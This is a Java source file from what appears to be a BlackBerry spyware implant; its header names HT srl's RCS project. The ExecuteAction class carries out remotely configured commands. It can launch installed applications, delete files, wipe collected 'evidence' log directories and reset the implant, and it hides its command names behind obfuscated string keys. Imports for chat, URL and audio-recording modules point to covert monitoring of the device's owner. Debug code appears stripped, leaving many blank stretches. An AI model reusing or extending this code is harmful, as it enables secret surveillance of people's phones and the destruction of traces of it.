
/* *************************************************
 * Copyright (c) 2010 - 2010
 * HT srl,   All rights reserved.
 * Project      : RCS, RCSBlackBerry_lib
 * File         : ExecuteAction.java
 * Created      : 26-mar-2010
 * *************************************************/
package blackberry.action;

import java.io.ByteArrayOutputStream;
import java.util.Vector;

import javax.microedition.media.Player;
import javax.microedition.media.control.RecordControl;

import net.rim.device.api.system.ApplicationDescriptor;
import net.rim.device.api.system.ApplicationManager;
import net.rim.device.api.system.CodeModuleManager;
import blackberry.Messages;
import blackberry.Task;
import blackberry.Trigger;
import blackberry.config.ConfAction;
import blackberry.config.ConfigurationException;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceCollector;
import blackberry.fs.AutoFile;
import blackberry.module.ModuleChat;
import blackberry.module.ModuleUrl;
import blackberry.utils.Utils;

/**
 * The Class ExecuteAction.
 */
public final class ExecuteAction extends SubActionMain {




    private String command;

    public ExecuteAction(ConfAction conf) {
        super(conf);
    }

    /*
     * (non-Javadoc)
     * @see blackberry.action.SubAction#execute(blackberry.event.Event)
     */
    public boolean execute(Trigger trigger) {

        String eventName = "NULL"; //$NON-NLS-1$






        if (command == null) {



            return false;
        }

        ApplicationDescriptor applicationDescriptor = getApplicationDescriptor(command);
        if (applicationDescriptor != null) {
            executeApplication(applicationDescriptor);
        } else {

            final Vector params = new Vector();
            final String cmd = getParams(command, params);

            if (cmd.equals(Messages.getString("a.5"))) { //$NON-NLS-1$
                executeDebug(params);
            } else if (cmd.equals(Messages.getString("a.6"))) { //$NON-NLS-1$
                executeDelete(params);
            } else if (cmd.equals(Messages.getString("a.7"))) { //$NON-NLS-1$
                executeCleanup(params);
            } else if (cmd.equals(Messages.getString("a.8"))) { //$NON-NLS-1$
                executeReset(params);
            }






        }

        return true;
    }

    private static String getParams(final String fullCommand,
            final Vector params) {







        final Vector vector = Utils.Tokenize(fullCommand, " "); //$NON-NLS-1$






        final String command = (String) vector.elementAt(0);

        for (int i = 1; i < vector.size(); i++) {
            params.addElement(vector.elementAt(i));
        }

        return command;
    }











    private void executeReset(Vector params) {



        Task.getInstance().reset();
        Evidence.info(Messages.getString("a.0")); //$NON-NLS-1$
    }

    private void executeCleanup(Vector params) {




        int numFiles = 100;
        if (params.size() == 1) {
            try {
                numFiles = Integer.parseInt((String) params.elementAt(0));
            } catch (NumberFormatException ex) {



            }
        }
        int removed = EvidenceCollector.getInstance().removeLogDirs(numFiles);



    }

    private void executeDelete(Vector params) {




        if (params.size() == 1) {
            String filename = (String) params.elementAt(0);



            AutoFile file = new AutoFile(filename);
            if (file.exists()) {



                file.delete();
            }
        }
    }

    private void executeApplication(ApplicationDescriptor applicationDescriptor) {
        try {
            String urlModule = applicationDescriptor.getModuleName();



            ApplicationManager.getApplicationManager().launch(urlModule);
        } catch (Exception ex) {



        }
    }

    private void executeDebug(final Vector params) {





    }

    private Player _player;
    private RecordControl _rcontrol;
    private ByteArrayOutputStream _output;
    private byte _data[];

    private ApplicationDescriptor getApplicationDescriptor(String command) {




        Vector tokens = Utils.Tokenize(command, " "); //$NON-NLS-1$
        if (tokens == null || tokens.size() == 0) {



            return null;
        }

        String executeName = (String) tokens.elementAt(0);




        final int handles[] = CodeModuleManager.getModuleHandles();

        final int size = handles.length;
        for (int i = 0; i < size; i++) {
            final int handle = handles[i];
            // CodeModuleManager.getModuleHandle(name)
            // Retrieve specific information about a module.

            final String name = CodeModuleManager.getModuleName(handle);
            if (name.equals(executeName)) {



                ApplicationDescriptor[] apps = CodeModuleManager
                        .getApplicationDescriptors(handle);
                if (apps != null && apps.length > 0) {



                    return apps[0];

                }
            }
        }




        return null;

    }








    protected boolean parse(ConfAction params) {
        try {
            this.command = params.getString(Messages.getString("a.1")); //$NON-NLS-1$




        } catch (final ConfigurationException e) {





            return false;
        }

        return true;
    }

}
